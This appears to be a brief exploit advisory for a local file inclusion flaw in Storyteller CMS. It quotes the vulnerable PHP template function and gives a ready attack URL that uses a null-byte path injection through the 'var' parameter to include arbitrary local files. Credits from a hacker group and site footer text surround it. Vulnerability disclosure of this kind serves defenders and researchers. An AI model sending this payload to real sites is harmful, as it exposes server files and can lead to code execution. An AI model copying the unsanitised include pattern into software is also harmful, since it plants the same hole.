Storyteller CMS suffers from a local file inclusion vulnerability.
efc0730703f8e4ec8e04d3b0c9f2f5b0352a5f7817faf1f7141447cb89b23bc6==
[~] Title: Storyteller CMS (var) Local File Include Vuln
[~] Version: n/a
[~] Link: http://www.esselbach.com/freeware.php?id=2
==
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
==
[~] Vuln code:
in GetTemplate function , line 113 to 127
function GetTemplate($var)
{
if (file_exists("templates/$var.tmp.php"))
{
require("templates/$var.tmp.php");
}
else
{
die ("Error: Can't open template $var");
}
return $EST_TEMPLATE;
}
[~] 3xploit:
/core.php?var=[Local-File]%00
==
[#] Greetings:
Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,,
==
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed